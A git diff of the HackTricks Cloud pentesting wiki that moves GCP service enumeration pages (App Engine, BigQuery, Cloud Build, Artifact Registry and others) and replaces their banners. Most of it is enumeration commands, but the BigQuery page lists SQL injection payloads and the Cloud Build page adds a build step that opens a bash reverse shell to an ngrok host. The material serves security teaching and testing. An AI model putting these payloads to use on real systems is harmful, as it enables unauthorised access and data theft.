-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/gcp-security/gcp-services/README.md b/src/pentesting-cloud/gcp-security/gcp-services/README.md
similarity index 100%
rename from pentesting-cloud/gcp-security/gcp-services/README.md
rename to src/pentesting-cloud/gcp-security/gcp-services/README.md
diff --git a/src/pentesting-cloud/gcp-security/gcp-services/gcp-ai-platform-enum.md b/src/pentesting-cloud/gcp-security/gcp-services/gcp-ai-platform-enum.md
new file mode 100644
index 000000000..7196bf8e7
--- /dev/null
+++ b/src/pentesting-cloud/gcp-security/gcp-services/gcp-ai-platform-enum.md
@@ -0,0 +1,22 @@
+# GCP - AI Platform Enum
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## [AI Platform](https://cloud.google.com/sdk/gcloud/reference/ai-platform/) 
+
+Google [**AI Platform**](https://cloud.google.com/ai-platform/) is another "**serverless**" offering for **machine learning projects**.
+
+There are a few areas here you can look for interesting information like models and jobs.
+
+```bash
+# Models
+gcloud ai-platform models list
+gcloud ai-platform models describe 
+gcloud ai-platform models get-iam-policy 
+
+# Jobs
+gcloud ai-platform jobs list
+gcloud ai-platform jobs describe 
+```
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/gcp-security/gcp-services/gcp-api-keys-enum.md b/src/pentesting-cloud/gcp-security/gcp-services/gcp-api-keys-enum.md
new file mode 100644
index 000000000..5d13eca1c
--- /dev/null
+++ b/src/pentesting-cloud/gcp-security/gcp-services/gcp-api-keys-enum.md
@@ -0,0 +1,44 @@
+# GCP - API Keys Enum
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Basic Information
+
+In Google Cloud Platform (GCP), API keys are a simple encrypted string that **identifies an application without any principa**l. They are used to **access Google Cloud APIs** that do not require user context. This means they are often used in scenarios where the application is accessing its own data rather than user data.
+
+### Restrictions
+
+You can **apply restrictions to API keys** for enhanced security. For example, you can restrict the key to be **used only by certain IP addresses, webs, android apps, iOS apps**, or restrict it to **certain APIs or services** within GCP.
+
+### Enumeration
+
+It's possible to **see the restriction of an API key** (including GCP API endpoints restriction) using the verbs list or describe:
+
+```bash
+gcloud services api-keys list
+gcloud services api-keys describe 
+gcloud services api-keys list --show-deleted
+```
+
+> [!NOTE]
+> It's possible to recover deleted keys before 30days passes, that's why you can list deleted keys.
+
+### Privilege Escalation & Post Exploitation
+
+{{#ref}}
+../gcp-privilege-escalation/gcp-apikeys-privesc.md
+{{#endref}}
+
+### Unauthenticated Enum
+
+{{#ref}}
+../gcp-unauthenticated-enum-and-access/gcp-api-keys-unauthenticated-enum.md
+{{#endref}}
+
+### Persistence
+
+{{#ref}}
+../gcp-persistence/gcp-api-keys-persistence.md
+{{#endref}}
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-app-engine-enum.md b/src/pentesting-cloud/gcp-security/gcp-services/gcp-app-engine-enum.md
similarity index 59%
rename from pentesting-cloud/gcp-security/gcp-services/gcp-app-engine-enum.md
rename to src/pentesting-cloud/gcp-security/gcp-services/gcp-app-engine-enum.md
index 3f78b88ec..0563fdb98 100644
--- a/pentesting-cloud/gcp-security/gcp-services/gcp-app-engine-enum.md
+++ b/src/pentesting-cloud/gcp-security/gcp-services/gcp-app-engine-enum.md
@@ -1,19 +1,6 @@
 # GCP - App Engine Enum
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
 
 ## Basic Information 
 
@@ -31,7 +18,7 @@ Google Cloud Platform's (GCP) App Engine is a **robust, serverless platform tail
 
 A simple **firewall** can be configured for the instances running the Apps with the following options:
 
-

+

 
 ### SA
 
@@ -43,15 +30,13 @@ The source code and metadata is **automatically stored in buckets** with names s
 
 **Every file** of the App is stored with the **sha1 of the content as filename**:
 
-

+

 
 Inside the **`ae`** folder from `staging..appspot.com`, **one folder per version exist** with the **source code** files and **`manifest.json`** file that **describes the components** of the App:
 
-{% code overflow="wrap" %}
 ```json
 {"requirements.txt":{"sourceUrl":"https://storage.googleapis.com/staging.onboarding-host-98efbf97812843.appspot.com/a270eedcbe2672c841251022b7105d340129d108","sha1Sum":"a270eedc_be2672c8_41251022_b7105d34_0129d108"},"main_test.py":{"sourceUrl":"https://storage.googleapis.com/staging.onboarding-host-98efbf97812843.appspot.com/0ca32fd70c953af94d02d8a36679153881943f32","sha1Sum":"0ca32fd7_0c953af9_4d02d8a ...
 ```
-{% endcode %}
 
 ### Containers
 
@@ -65,9 +50,8 @@ It might look like it's only possible to deploy 1 app engine web application per
 
 ### Enumeration
 
-{% hint style="danger" %}
-Every time you uploads a new code to the App, **a new version is created**. **All versions are stored** and they even have an **URL to access them**. So modifying the code of an old version could be a **great persistence technique**.
-{% endhint %}
+> [!CAUTION]
+> Every time you uploads a new code to the App, **a new version is created**. **All versions are stored** and they even have an **URL to access them**. So modifying the code of an old version could be a **great persistence technique**.
 
 As with Cloud Functions, **there is a chance that the application will rely on secrets that are accessed at run-time via environment variables**. These variables are stored in an **`app.yaml`** file which can be accessed as follows:
 
@@ -108,39 +92,26 @@ gcloud app ssl-certificates describe 
 
 ### Privilege Escalation
 
-{% content-ref url="../gcp-privilege-escalation/gcp-appengine-privesc.md" %}
-[gcp-appengine-privesc.md](../gcp-privilege-escalation/gcp-appengine-privesc.md)
-{% endcontent-ref %}
+{{#ref}}
+../gcp-privilege-escalation/gcp-appengine-privesc.md
+{{#endref}}
 
 ### Unauthenticated Enum
 
-{% content-ref url="../gcp-unauthenticated-enum-and-access/gcp-app-engine-unauthenticated-enum.md" %}
-[gcp-app-engine-unauthenticated-enum.md](../gcp-unauthenticated-enum-and-access/gcp-app-engine-unauthenticated-enum.md)
-{% endcontent-ref %}
+{{#ref}}
+../gcp-unauthenticated-enum-and-access/gcp-app-engine-unauthenticated-enum.md
+{{#endref}}
 
 ### Post Exploitation
 
-{% content-ref url="../gcp-post-exploitation/gcp-app-engine-post-exploitation.md" %}
-[gcp-app-engine-post-exploitation.md](../gcp-post-exploitation/gcp-app-engine-post-exploitation.md)
-{% endcontent-ref %}
+{{#ref}}
+../gcp-post-exploitation/gcp-app-engine-post-exploitation.md
+{{#endref}}
 
 ### Persistence
 
-{% content-ref url="../gcp-persistence/gcp-app-engine-persistence.md" %}
-[gcp-app-engine-persistence.md](../gcp-persistence/gcp-app-engine-persistence.md)
-{% endcontent-ref %}
+{{#ref}}
+../gcp-persistence/gcp-app-engine-persistence.md
+{{#endref}}
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-artifact-registry-enum.md b/src/pentesting-cloud/gcp-security/gcp-services/gcp-artifact-registry-enum.md
similarity index 54%
rename from pentesting-cloud/gcp-security/gcp-services/gcp-artifact-registry-enum.md
rename to src/pentesting-cloud/gcp-security/gcp-services/gcp-artifact-registry-enum.md
index 43b6b86a4..493e8b2d5 100644
--- a/pentesting-cloud/gcp-security/gcp-services/gcp-artifact-registry-enum.md
+++ b/src/pentesting-cloud/gcp-security/gcp-services/gcp-artifact-registry-enum.md
@@ -1,19 +1,6 @@
 # GCP - Artifact Registry Enum
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
 
 ## Basic Information
 
@@ -32,11 +19,11 @@ Key features of Artifact Registry include:
 
 When creating a new repository it's possible to **select a the format/type** of the repository among several like Docker, Maven, npm, Python... and the mode which usually can be one of these three:
 
-* **Standard Repository**: Default mode for **storing your own artifacts** (like Docker images, Maven packages) directly in GCP. It's secure, scalable, and integrates well within the Google Cloud ecosystem.
-* **Remote Repository** (if available): Acts as a proxy for **caching artifacts from external**, public repositories. It helps prevent issues from dependencies changing upstream and reduces latency by caching frequently accessed artifacts.
-* **Virtual Repository** (if available): Provides a **unified interface to access multiple (standard or remote) repositories** through a single endpoint, simplifying client-side configuration and access management for artifacts spread across various repositories.
-  * For a virtual repository you will need to **select repositories and give them a priority** (the repo with the largest priority will be used).
-  * You can **mix remote and standard** repositories in a **virtual** one, if the **priority** of the **remote** is **bigger** than the standard, **packages from remote (PyPi for example) will be used**. This could lead to a **Dependency Confusion.**
+- **Standard Repository**: Default mode for **storing your own artifacts** (like Docker images, Maven packages) directly in GCP. It's secure, scalable, and integrates well within the Google Cloud ecosystem.
+- **Remote Repository** (if available): Acts as a proxy for **caching artifacts from external**, public repositories. It helps prevent issues from dependencies changing upstream and reduces latency by caching frequently accessed artifacts.
+- **Virtual Repository** (if available): Provides a **unified interface to access multiple (standard or remote) repositories** through a single endpoint, simplifying client-side configuration and access management for artifacts spread across various repositories.
+  - For a virtual repository you will need to **select repositories and give them a priority** (the repo with the largest priority will be used).
+  - You can **mix remote and standard** repositories in a **virtual** one, if the **priority** of the **remote** is **bigger** than the standard, **packages from remote (PyPi for example) will be used**. This could lead to a **Dependency Confusion.**
 
 Note that in the **Remote version of Docker** it's possible to give a username and token to access Docker Hub. The **token is then stored in the Secret Manager**.
 
@@ -46,8 +33,8 @@ As expected, by default a Google-managed key is used but a Customer-managed key
 
 ### Cleanup Policies
 
-* **Delete artifacts:** Artifacts will be **deleted according to cleanup policy** criteria.
-* **Dry run:** (Default one) Artifacts will **not be deleted**. Cleanup policies will be evaluated, and test delete events sent to Cloud Audit Logging.
+- **Delete artifacts:** Artifacts will be **deleted according to cleanup policy** criteria.
+- **Dry run:** (Default one) Artifacts will **not be deleted**. Cleanup policies will be evaluated, and test delete events sent to Cloud Audit Logging.
 
 ### Vulnerability Scanning
 
@@ -80,39 +67,26 @@ gcloud artifacts docker images list-vulnerabilities projects//locatio
 
 ### Privilege Escalation
 
-{% content-ref url="../gcp-privilege-escalation/gcp-artifact-registry-privesc.md" %}
-[gcp-artifact-registry-privesc.md](../gcp-privilege-escalation/gcp-artifact-registry-privesc.md)
-{% endcontent-ref %}
+{{#ref}}
+../gcp-privilege-escalation/gcp-artifact-registry-privesc.md
+{{#endref}}
 
 ### Unauthenticated Access
 
-{% content-ref url="../gcp-unauthenticated-enum-and-access/gcp-artifact-registry-unauthenticated-enum.md" %}
-[gcp-artifact-registry-unauthenticated-enum.md](../gcp-unauthenticated-enum-and-access/gcp-artifact-registry-unauthenticated-enum.md)
-{% endcontent-ref %}
+{{#ref}}
+../gcp-unauthenticated-enum-and-access/gcp-artifact-registry-unauthenticated-enum.md
+{{#endref}}
 
 ### Post-Exploitation
 
-{% content-ref url="../gcp-post-exploitation/gcp-artifact-registry-post-exploitation.md" %}
-[gcp-artifact-registry-post-exploitation.md](../gcp-post-exploitation/gcp-artifact-registry-post-exploitation.md)
-{% endcontent-ref %}
+{{#ref}}
+../gcp-post-exploitation/gcp-artifact-registry-post-exploitation.md
+{{#endref}}
 
 ### Persistence
 
-{% content-ref url="../gcp-persistence/gcp-artifact-registry-persistence.md" %}
-[gcp-artifact-registry-persistence.md](../gcp-persistence/gcp-artifact-registry-persistence.md)
-{% endcontent-ref %}
+{{#ref}}
+../gcp-persistence/gcp-artifact-registry-persistence.md
+{{#endref}}
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/gcp-security/gcp-services/gcp-batch-enum.md b/src/pentesting-cloud/gcp-security/gcp-services/gcp-batch-enum.md
new file mode 100644
index 000000000..9a8812bad
--- /dev/null
+++ b/src/pentesting-cloud/gcp-security/gcp-services/gcp-batch-enum.md
@@ -0,0 +1,35 @@
+# GCP - Batch Enum
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Basic Information
+
+**Google Cloud Platform (GCP) Batch Service** is designed for running **large-scale batch computing workloads**, automating the management, scheduling, and execution of batch jobs across scalable cloud resources. This service simplifies operations and optimizes costs by allowing users to leverage preemptible VMs and integrates seamlessly with other GCP services for comprehensive batch processing workflows. It's ideal for data processing, financial modeling, and scientific simulations.
+
+### Service Account
+
+Although (currently) it's not possible to select the SA that the batch job will be executed with, **it'll use the compute SA** (Editor permissions usually).
+
+## Enumeration
+
+```bash
+# List jobs
+gcloud batch jobs list
+
+# Get job info
+gcloud batch jobs describe  --location 
+
+# List tasks
+gcloud batch tasks list --location  --job 
+
+# Gte info of tasks executions
+gcloud batch tasks describe projects//locations//jobs//taskGroups//tasks/
+```
+
+## Privilege Escalation
+
+{{#ref}}
+../gcp-privilege-escalation/gcp-batch-privesc.md
+{{#endref}}
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-bigquery-enum.md b/src/pentesting-cloud/gcp-security/gcp-services/gcp-bigquery-enum.md
similarity index 64%
rename from pentesting-cloud/gcp-security/gcp-services/gcp-bigquery-enum.md
rename to src/pentesting-cloud/gcp-security/gcp-services/gcp-bigquery-enum.md
index e6154ba77..98db30a8b 100644
--- a/pentesting-cloud/gcp-security/gcp-services/gcp-bigquery-enum.md
+++ b/src/pentesting-cloud/gcp-security/gcp-services/gcp-bigquery-enum.md
@@ -1,19 +1,6 @@
 # GCP - Bigquery Enum
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
 
 ## Basic Information
 
@@ -97,7 +84,7 @@ bq ls --row_access_policies :.
 # Get row policies
 
 ### Columns Access Control
 
-

+

 
 To restrict data access at the column level:
 
@@ -109,9 +96,8 @@ To restrict data access at the column level:
 
 When a user tries to access column data at query time, BigQuery **checks the column policy tag and its policy to see whether the user is authorized to access the data**.
 
-{% hint style="success" %}
-As summary, to restrict the access to some columns to some users, you can **add a tag to the column in the schema and restrict the access** of the users to the tag enforcing access control on the taxonomy of the tag.
-{% endhint %}
+> [!TIP]
+> As summary, to restrict the access to some columns to some users, you can **add a tag to the column in the schema and restrict the access** of the users to the tag enforcing access control on the taxonomy of the tag.
 
 To enforce access control on the taxonomy it's needed to enable the service:
 
@@ -121,17 +107,14 @@ gcloud services enable bigquerydatapolicy.googleapis.com
 
 It's possible to see the tags of columns with:
 
-{% code overflow="wrap" %}
 ```bash
 bq show --schema :.

 
 [{"name":"username","type":"STRING","mode":"NULLABLE","policyTags":{"names":["projects/.../locations/us/taxonomies/2030629149897327804/policyTags/7703453142914142277"]},"maxLength":"20"},{"name":"age","type":"INTEGER","mode":"NULLABLE"}]
 ```
-{% endcode %}
 
 ### Enumeration
 
-{% code overflow="wrap" %}
 ```bash
 # Dataset info
 bq ls # List datasets
@@ -170,7 +153,6 @@ bq show --location= show --format=prettyjson --job=true 
 # Misc
 bq show --encryption_service_account # Get encryption service account
 ```
-{% endcode %}
 
 ### BigQuery SQL Injection
 
@@ -178,89 +160,70 @@ For further information you can check the blog post: [https://ozguralp.medium.co
 
 **Comments**:
 
-* `select 1#from here it is not working`
-* `select 1/*between those it is not working*/` But just the initial one won't work
-* `select 1--from here it is not working`
+- `select 1#from here it is not working`
+- `select 1/*between those it is not working*/` But just the initial one won't work
+- `select 1--from here it is not working`
 
 Get **information** about the **environment** such as:
 
-* Current user: `select session_user()`
-* Project id: `select @@project_id`
+- Current user: `select session_user()`
+- Project id: `select @@project_id`
 
 Concat rows:
 
-* All table names: `string_agg(table_name, ', ')`
+- All table names: `string_agg(table_name, ', ')`
 
 Get **datasets**, **tables** and **column** names:
 
-* **Project** and **dataset** name:
+- **Project** and **dataset** name:
 
-{% code overflow="wrap" %}
 ```sql
 SELECT catalog_name, schema_name FROM INFORMATION_SCHEMA.SCHEMATA
 ```
-{% endcode %}
 
-* **Column** and **table** names of **all the tables** of the dataset:
+- **Column** and **table** names of **all the tables** of the dataset:
 
-{% code overflow="wrap" %}
 ```sql
 # SELECT table_name, column_name FROM ..INFORMATION_SCHEMA.COLUMNS
 
 SELECT table_name, column_name FROM ..INFORMATION_SCHEMA.COLUMNS
 ```
-{% endcode %}
 
-* **Other datasets** in the same project:
+- **Other datasets** in the same project:
 
-{% code overflow="wrap" %}
 ```sql
 # SELECT catalog_name, schema_name, FROM .INFORMATION_SCHEMA.SCHEMATA
 
 SELECT catalog_name, schema_name, NULL FROM .INFORMATION_SCHEMA.SCHEMATA
 ```
-{% endcode %}
 
 **SQL Injection types:**
 
-* Error based - casting: `select CAST(@@project_id AS INT64)`
-* Error based - division by zero: `' OR if(1/(length((select('a')))-1)=1,true,false) OR '`
-* Union based (you need to use ALL in bigquery): `UNION ALL SELECT (SELECT @@project_id),1,1,1,1,1,1)) AS T1 GROUP BY column_name#`
-* Boolean based: ``' WHERE SUBSTRING((select column_name from `project_id.dataset_name.table_name` limit 1),1,1)='A'#``
-* Potential time based - Usage of public datasets example: ``SELECT * FROM `bigquery-public-data.covid19_open_data.covid19_open_data` LIMIT 1000``
+- Error based - casting: `select CAST(@@project_id AS INT64)`
+- Error based - division by zero: `' OR if(1/(length((select('a')))-1)=1,true,false) OR '`
+- Union based (you need to use ALL in bigquery): `UNION ALL SELECT (SELECT @@project_id),1,1,1,1,1,1)) AS T1 GROUP BY column_name#`
+- Boolean based: `` ' WHERE SUBSTRING((select column_name from `project_id.dataset_name.table_name` limit 1),1,1)='A'# ``
+- Potential time based - Usage of public datasets example: `` SELECT * FROM `bigquery-public-data.covid19_open_data.covid19_open_data` LIMIT 1000 ``
 
 **Documentation:**
 
-* All function list: [https://cloud.google.com/bigquery/docs/reference/standard-sql/functions-and-operators](https://cloud.google.com/bigquery/docs/reference/standard-sql/functions-and-operators)
-* Scripting statements: [https://cloud.google.com/bigquery/docs/reference/standard-sql/scripting](https://cloud.google.com/bigquery/docs/reference/standard-sql/scripting)
+- All function list: [https://cloud.google.com/bigquery/docs/reference/standard-sql/functions-and-operators](https://cloud.google.com/bigquery/docs/reference/standard-sql/functions-and-operators)
+- Scripting statements: [https://cloud.google.com/bigquery/docs/reference/standard-sql/scripting](https://cloud.google.com/bigquery/docs/reference/standard-sql/scripting)
 
 ### Privilege Escalation & Post Exploitation
 
-{% content-ref url="../gcp-privilege-escalation/gcp-bigquery-privesc.md" %}
-[gcp-bigquery-privesc.md](../gcp-privilege-escalation/gcp-bigquery-privesc.md)
-{% endcontent-ref %}
+{{#ref}}
+../gcp-privilege-escalation/gcp-bigquery-privesc.md
+{{#endref}}
 
 ### Persistence
 
-{% content-ref url="../gcp-persistence/gcp-bigquery-persistence.md" %}
-[gcp-bigquery-persistence.md](../gcp-persistence/gcp-bigquery-persistence.md)
-{% endcontent-ref %}
+{{#ref}}
+../gcp-persistence/gcp-bigquery-persistence.md
+{{#endref}}
 
 ## References
 
-* [https://cloud.google.com/bigquery/docs/column-level-security-intro](https://cloud.google.com/bigquery/docs/column-level-security-intro)
+- [https://cloud.google.com/bigquery/docs/column-level-security-intro](https://cloud.google.com/bigquery/docs/column-level-security-intro)
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/gcp-security/gcp-services/gcp-bigtable-enum.md b/src/pentesting-cloud/gcp-security/gcp-services/gcp-bigtable-enum.md
new file mode 100644
index 000000000..a4bcbbdbc
--- /dev/null
+++ b/src/pentesting-cloud/gcp-security/gcp-services/gcp-bigtable-enum.md
@@ -0,0 +1,32 @@
+# GCP - Bigtable Enum
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## [Bigtable](https://cloud.google.com/sdk/gcloud/reference/bigtable/) 
+
+A fully managed, scalable NoSQL database service for large analytical and operational workloads with up to 99.999% availability. [Learn more](https://cloud.google.com/bigtable).
+
+```bash
+# Cloud Bigtable
+gcloud bigtable instances list
+gcloud bigtable instances describe 
+gcloud bigtable instances get-iam-policy 
+
+## Clusters
+gcloud bigtable clusters list
+gcloud bigtable clusters describe 
+
+## Backups
+gcloud bigtable backups list --instance 
+gcloud bigtable backups describe --instance  
+gcloud bigtable backups get-iam-policy --instance  
+
+## Hot Tables
+gcloud bigtable hot-tablets list
+
+## App Profiles
+gcloud bigtable app-profiles list --instance 
+gcloud bigtable app-profiles describe --instance  
+```
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-build-enum.md b/src/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-build-enum.md
new file mode 100644
index 000000000..387f2272a
--- /dev/null
+++ b/src/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-build-enum.md
@@ -0,0 +1,171 @@
+# GCP - Cloud Build Enum
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Basic Information
+
+Google Cloud Build is a managed CI/CD platform that **automates software build** and release processes, integrating with **source code repositories** and supporting a wide range of programming languages. It **allows developers to build, test, and deploy code automatically** while providing flexibility to customize build steps and workflows.
+
+Each Cloud Build Trigger is **related to a Cloud Repository or directly connected with an external repository** (Github, Bitbucket and Gitlab).
+
+> [!TIP]
+> I couldn't see any way to steal the Github/Bitbucket token from here or from Cloud Repositories because when the repo is downloaded it's accessed via a [https://source.cloud.google.com/](https://source.cloud.google.com/) URL and Github is not accessed by the client.
+
+### Events
+
+The Cloud Build can be triggered if:
+
+- **Push to a branch**: Specify the branch
+- **Push a new tag**: Specify the tag
+- P**ull request**: Specify the branch that receives the PR
+- **Manual Invocation**
+- **Pub/Sub message:** Specify the topic
+- **Webhook event**: Will expose a HTTPS URL and the request must be authenticated with a secret
+
+### Execution
+
+There are 3 options:
+
+- A yaml/json **specifying the commands** to execute. Usually: `/cloudbuild.yaml`
+  - Only one that can be specified “inline” in the web console and in the cli
+  - Most common option
+  - Relevant for unauthenticated access
+- A **Dockerfile** to build
+- A **Buildpack** to build
+
+### SA Permissions
+
+The **Service Account has the `cloud-platform` scope**, so it can **use all the privileges.** If **no SA is specified** (like when doing submit) the **default SA** `@cloudbuild.gserviceaccount.com` will be **used.**
+
+By default no permissions are given but it's fairly easy to give it some:
+
+

+
+### Approvals
+
+It's possible to config a Cloud Build to **require approvals for build executions** (disabled by default).
+
+### PR Approvals
+
+When the trigger is PR because **anyone can perform PRs to public repositories** it would be very dangerous to just **allow the execution of the trigger with any PR**. Therefore, by default, the execution will only be **automatic for owners and collaborators**, and in order to execute the trigger with other users PRs an owner or collaborator must comment `/gcbrun`.
+
+

+
+### Connections & Repositories
+
+Connections can be created over:
+
+- **GitHub:** It will show an OAuth prompt asking for permissions to **get a Github token** that will be stored inside the **Secret Manager.**
+- **GitHub Enterprise:** It will ask to install a **GithubApp**. An **authentication token** from your GitHub Enterprise host will be created and stored in this project as a S**ecret Manager** secret.
+- **GitLab / Enterprise:** You need to **provide the API access token and the Read API access toke**n which will stored in the **Secret Manager.**
+
+Once a connection is generated, you can use it to **link repositories that the Github account has access** to.
+
+This option is available through the button:
+
+

+
+> [!TIP]
+> Note that repositories connected with this method are **only available in Triggers using 2nd generation.**
+
+### Connect a Repository
+
+This is not the same as a **`connection`**. This allows **different** ways to get **access to a Github or Bitbucket** repository but **doesn't generate a connection object, but it does generate a repository object (of 1st generation).**
+
+This option is available through the button:
+
+

+
+### Storage
+
+Sometimes Cloud Build will **generate a new storage to store the files for the trigger**. This happens for example in the example that GCP offers with:
+
+```bash
+git clone https://github.com/GoogleCloudBuild/cloud-console-sample-build && \
+  cd cloud-console-sample-build && \
+  gcloud builds submit --config cloudbuild.yaml --region=global
+```
+
+A Storage bucket called [security-devbox_cloudbuild](https://console.cloud.google.com/storage/browser/security-devbox_cloudbuild;tab=objects?forceOnBucketsSortingFiltering=false&project=security-devbox) is created to store a `.tgz` with the files to be used.
+
+### Get shell
+
+```yaml
+steps:
+  - name: bash
+    script: |
+      #!/usr/bin/env bash
+      bash -i >& /dev/tcp/5.tcp.eu.ngrok.io/12395 0>&1
+options:
+  logging: CLOUD_LOGGING_ONLY
+```
+
+Install gcloud inside cloud build:
+
+```bash
+# https://stackoverflow.com/questions/28372328/how-to-install-the-google-cloud-sdk-in-a-docker-image
+curl https://dl.google.com/dl/cloudsdk/release/google-cloud-sdk.tar.gz > /tmp/google-cloud-sdk.tar.gz
+mkdir -p /usr/local/gcloud
+tar -C /usr/local/gcloud -xvf /tmp/google-cloud-sdk.tar.gz
+/usr/local/gcloud/google-cloud-sdk/install.sh
+```
+
+### Enumeration
+
+You could find **sensitive info in build configs and logs**.
+
+```bash
+# Get configured triggers configurations
+gcloud builds triggers list # Check for the words github and bitbucket
+gcloud builds triggers describe 
+
+# Get build executions
+gcloud builds list
+gcloud builds describe  # Get even the build yaml if defined in there
+gcloud builds log  # Get build logs
+
+# List all connections of each region
+regions=("${(@f)$(gcloud compute regions list --format='value(name)')}")
+for region in $regions; do
+    echo "Listing build connections in region: $region"
+    connections=("${(@f)$(gcloud builds connections list --region="$region" --format='value(name)')}")
+    if [[ ${#connections[@]} -eq 0 ]]; then
+        echo "No connections found in region $region."
+    else
+        for connection in $connections; do
+            echo "Describing connection $connection in region $region"
+            gcloud builds connections describe "$connection" --region="$region"
+            echo "-----------------------------------------"
+        done
+    fi
+    echo "========================================="
+done
+
